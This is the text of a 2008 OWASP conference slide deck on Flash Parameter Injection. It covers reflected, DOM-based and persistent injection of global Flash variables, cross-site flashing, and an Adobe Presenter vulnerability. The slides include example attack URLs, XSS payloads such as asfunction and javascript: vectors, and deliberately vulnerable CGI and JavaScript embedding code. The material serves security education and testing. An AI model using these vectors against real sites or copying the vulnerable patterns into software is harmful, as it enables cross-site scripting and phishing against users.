520 likes | 1.1k Views
Flash Parameter Injection. Ayal Yogev Adi Sharabani IBM Rational Application Security {ayal, adish}. OWASP. 25/09/2008. The OWASP Foundation. http://www.owasp.org. Agenda. Flash 101 Flash Security The Problem Flash Parameter Injection Real Example Testing. F lash 101. Background.
E N D
Flash Parameter Injection Ayal Yogev Adi Sharabani IBM Rational Application Security {ayal, adish} OWASP 25/09/2008 The OWASP Foundation http://www.owasp.org
Agenda • Flash 101 • Flash Security • The Problem • Flash Parameter Injection • Real Example • Testing
Background • Introduced in 1996 • Adds animation and interactivity to Web pages • Contains a scripting language: Action Script • Very popular • Installed in over 99% of PCs • Advanced technologies: • Flex • Adobe AIR http://www.adobe.com/products/player_census/flashplayer/
<body> <h1>My Flash Movie</h1> <objecttype="application/x-shockwave-flash"> <paramname="allowScriptAccess"value="sameDomain" /> <paramname="movie"value="movie.swf" /> <paramname="quality"value="high" /> <paramname="bgcolor"value="#ffffff" /> <embedsrc="movie.swf></embed> </object> </body> Host (Browser) Flash Player HTML Flash Movie (SWF) Accessing Flash movies • Can be embedded in HTML pages
<html> <bodymarginwidth="0"marginheight="0"> <embedwidth="100%"height="100%“ name="plugin"src="http://host/movie.swf" type="application/x-shockwave-flash"/> </body> </html> HTML Accessing Flash movies • Can be embedded in HTML pages • Can be accessed directly • http://host/movie.swf • A “dummy” HTML page may be created (browser dependant) • DOM access according to policy • Example (Firefox):
if (_root.myparam == undefined) { _root.myparam = “my default value”; } Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Common use:
<body> <objecttype="application/x-shockwave-flash" data=" " width="600"height="345"> </object> </body> HTML Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Assigning Global Variables as parameters • Direct Reference • Embedded URI • Flash Attributes http://host/movie.swf?a=5&b=hello movie.swf?a=5&b=hello
HTML Global Flash Variables • Action Script supports Global Variables • Global Variables can be assigned from outside the movie • Assigning Global Variables as parameters • Direct Reference • Embedded URI • Flash Attributes width="600"height="345"> </object> </body> <body> <objecttype="application/x-shockwave-flash" data="movie.swf" <body> <objecttype="application/x-shockwave-flash" data="movie.swf?" a=5&b=hello flashvars=" "
Previous Research • Bypassing JavaScript Filters – the Flash! Attack Eye on Security, August 2002 • Misuse of Macromedia Flash Ads clickTAG Option May Lead to Privacy BreachScan Security Wire, April 2003 • Testing Flash Applications Stefano Di Paola, May 2007 • Finding Vulnerabilities in Flash ApplicationsStefano Di Paola, November 2007
Controlling Global Flash Variables can result in... • Cross-Site Flashing • Cross-Site Scripting through Flash • Phishing • Flow Manipulation • …
Flash Player if(_root.movieURI ==undefined) { _root.movieURI = "http://host/movie.swf"; } loadMovieNum(_root.movieURI, 1); Flash Player Malicious Flash Flash Movie Cross-Site Flashing • A vulnerable movie is tricked into loading a malicious movie • The malicious movie gets access to the same sandbox • Can be achieved using methods like loadMovie*: • Attack Vector http://host/movie.swf?movieURI=maliciousFile.swf
Cross-Site Scripting through Flash • Classic XSS using a vulnerable Flash file • Can be triggered by the use of global flash variables in: • getURL using payload javascript:alert('XSS') • Load* functions using payload asfunction:getURL,javascript:alert('XSS') • TextField.htmlText using payload <img src='javascript:alert(“XSS”)//.jpg'> • ...
Cross-Site Scripting through Flash (Example) • Consider movie.swf containing the code: if(_root.url ==undefined) { _root.url = "http://host/"; } getURL(_root.url);
Cross-Site Scripting through Flash (Example) Attack Vector: http://host/movie.swf?url=javascript:alert(‘gotcha!’) if(_root.url ==undefined) { _root.url = "http://host/"; } getURL(_root.url);
Host (Browser) Host (Browser) Flash Player Flash Player Flash Movie (SWF) Flash Movie (SWF) The Missing Link • Flash cannot always load without the original HTML • Flash movies may rely on parts of the DOM to execute • Use JavaScript variables and methods • Use HTML Dom elements • Direct access to flash may be restricted due to security
Known examples of Flash attacks involve accessing the movie directly
BUT… Some Flash movies cannot load when accessed directly
FPI Injecting global variables into Flash in its original HTML environment
CGI <object type="application/x-shockwave-flash" data=""></object>'; HTML Reflected FPI • Possible when the location of the Flash movie is retrieved through a URL parameter: • Attack example: # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="' .$params{movie}. '"></object>'; http://host/index.cgi?movie=movie.swf?globalVar=e-v-i-l movie.swf?globalVar=e-v-i-l
CGI HTML Reflected FPI (Piggybacking FlashVars) • Attack possible when global flash variables are received from HTML parameters without sanitization: • Attack occurs when victim is lured to click on a link line: # Read the 'language' parameter my $language = $params{language}; # Embed the Flash movie print '<object type="application/x-shockwave-flash" data="movie.swf" flashvars="language=' . $language.replace(’"’,’’). '"></object>'; <html> … <objecttype="application/x-shockwave-flash" data="movie.swf" flashvars="language= "> </object> … English&globalVar=e-v-i-l %26 is decoded to & http://host/index.cgi?language=English%26globalVar=e-v-i-l English%26globalVar=e-v-i-l
<objecttype='application/x-shockwave-flash' data='movie.swf' width=' '> </object> CGI HTML FlashVars Injection • Possible when an attribute of object tag is received as a parameter: • Attack vector: # Embed the flash movie print "<object type='application/xshockwave-flash' " . "data='movie.swf' width='" . $params{width} . "'></object>"; 600%27%20flashvars=%27globalVar=e-v-i-l http://host/index.cgi?width=600%27%20flashvars=%27globalVar=e-v-i-l 600' flashvars='globalVar=e-v-i-l Decode values
HTML DOM Based FPI • document.location is used as a global Flash variable: <scripttype="text/javascript"language="JavaScript"> vars = ''; varloc = encodeURI(document.location); s += '<object>'; s += ' <embed src="movie.swf" flashvars="location='+ loc +'">'; s += ' </embed>'; s += '</object>'; document.write(s); </script>
HTML DOM Based FPI (continued) • Attack vector: • The global variable is injected into the Flash movie embedded inside the DOM: http://host/index.htm#&globalVar=e-v-i-l http://host/index.htm#&globalVar=e-v-i-l <object> <embedsrc="movie.swf" flashvars="location="> </embed> </object>
DOM Based FPI (continued) • JavaScript function encodeURI is not sufficient in this case • Can prevent DOM based XSS but not DOM Based FPI • Does not encode all characters (e.g. ‘&’,’?’) • encodeURIComponent,escape or similar methods must be used • Appropriate encoding must be used (depending on context) • Attack is invisible to IDS and IPS • Data following ‘#’ is not sent to the server(‘?’ also works, but data following it is sent to the server)
Persistent FPI • Shared local Flash objects (a.k.a. Flash cookies) • Used to store persistent data across multiple sessions and save Flash state • Storing shared local Flash objects: // Create a shared object mySharedObject = SharedObject.getLocal("sharedObjName"); // Store data in the shared object mySharedObject.data.name ="jsmith"; mySharedObject.data.homepage ="http://demo.testfire.net"; // Flush mySharedObject.flush();
Persistent FPI (continued) • Loading shared local Flash objects: // Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal("sharedObjName"); // Check whether variable name exists if(mySharedObject.data.name ==null) { // Shared object doesn't exist } else { // Read the name name = mySharedObject.data.name; // Read the homepage homepage = mySharedObject.data.homepage; }
// Create a new shared object or read an existing one mySharedObject = SharedObject.getLocal(“urlToLoad"); // Check whether there is a shared object saved if(mySharedObject.data.url == null) { // Store the URL in a shared object mySharedObject.data.url = _root.inputURL; } // Get the URL getURL(mySharedObject.data.url); Host (Browser) Flash Player Flash Player Flash Movie Flash Movie Persistent FPI (continued) • Shared local Flash object is controlled by user input • Object is used inside the getURL method
Persistent FPI (continued) • After the first infection, XSS will be executed every time the movie is loaded • Attack can persist after vulnerability is fixed • IDS or IPS will only be able to detect initial infection
HTML Adobe Presenter FPI Vulnerability • Illustration of the automatically created HTML: function showFlash(swf, w, h, loop) { var myLocation = document.location; //... s +='<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); } function showFlash(swf, w, h, loop) { var myLocation = encodeURI(document.location); //... s +='<param name="FlashVars" value="'+ 'initialURL=' + myLocation + '&isMSIE=' + isMSIE + '&useBSM=false" />' //... document.write(s); }
Adobe Presenter FPI Vulnerability (continued) • Movie Viewer.swf vulnerable to XSS through Flash: • Global parameter _url with payload “javascript:alert(‘XSS’)” • Global parameter baseurl with payload “asfunction:getURL,javascript:alert(‘XSS’)” • Works in Flash Player version 9,0,47,0 on both IE and Firefox • DOM based FPI allows the Flash to load within original HTML • Invisible to IPS/IDS • Vendors must recompile their Flash files to fix the problem http://host/index.htm#&_url=javascript:alert(document.domain)
Testing • Identify controlled Flash parameters: • Query parameters (from HTML) • FlashVars (from HTML) • Uninstantiated variables (from Action Script) • Locate potentially dangerous code: • Where controlled Flash parameters are used inside methods like: getURL, loadMovie, etc. • Save sequences leading to potentially dangerous code • Associate with parameter
Testing (continued) • Mutation - Inject values into the parameters • XSS: javascript:window.open(‘http://my.site’) • XSF: http://my.site/movie.swf • Phishing: http://my.site • Validation • Play relevant sequences belonging to mutated parameter • Verify test results • Browser events • Action Script level Test Flash movie within its original HTML environment